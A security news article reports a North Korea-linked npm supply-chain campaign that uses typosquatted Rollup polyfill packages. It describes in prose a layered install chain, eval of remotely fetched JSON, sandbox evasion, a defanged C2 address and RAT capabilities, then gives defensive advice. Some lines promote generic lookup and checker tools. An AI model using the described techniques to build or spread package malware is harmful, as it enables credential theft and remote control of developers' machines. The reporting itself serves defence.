North Korean Hackers Hide Malware in Fake Rollup npm Packages
Security researchers at JFrog have uncovered a new North Korea-linked software supply chain campaign targeting JavaScript developers through malicious npm packages disguised as legitimate Rollup polyfill tooling. The two primary packages, "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core," closely mimic the well-known "rollup-plugin-polyfill-node" project, copying its description, repository metadata, and package structure to blend into a developer's dependency review process. Four additional packages—quirky-token, react-icon-svgs, rollup-plugin-polyfill-connect, and swift-parse-stream—were also identified and have since been removed from the npm registry. The campaign mirrors tactics used in prior Lazarus Group operations, layering the payloads so each package installs a second-stage loader to obscure the true intent.
The attack chain begins with a Base64-encoded npm install command hidden inside the primary packages, which pulls in one of the second-stage loaders. These second-stage packages are dressed up as SVG sanitization utilities but, once executed, they fetch a JSON object from JSONKeeper and eval the contents of the "model" field to run embedded JavaScript. The payload performs environmental checks to evade cloud development environments, sandboxes, serverless runtimes, and analysis infrastructure before reaching out to a command-and-control server at 216.126.236[.]244 to download an encrypted JavaScript loader. Developers who suspect exposure can verify the hosting infrastructure behind suspicious domains using a WHOIS lookup and audit outbound traffic with a port scanner to detect unauthorized listeners opened on compromised workstations.
Once decrypted, the payload functions as a remote access trojan, enabling interactive terminal sessions, arbitrary command execution, screenshot capture, process termination, and Windows-specific mouse and keyboard manipulation. This toolkit aligns with the BeaverTail and OtterCookie malware families previously tied to the Contagious Interview campaign, in which Panther Labs reported 108 malicious npm packages across 261 versions, including "rollup-plugin-polyfill-route" published in March 2026. The recurrence of Rollup-themed typosquats suggests North Korean operators are refining a repeatable playbook that exploits developer trust in well-known build-tool ecosystems.
Developers and security teams are urged to audit their npm dependency trees for any of the six flagged packages, rotate credentials for systems that may have executed them, and review build server logs for outbound connections to 216.126.236[.]244. Given the credential-theft focus of this campaign, affected users should also verify that their developer accounts have not been compromised using an email breach checker and update any reused passwords after testing their strength with a password checker.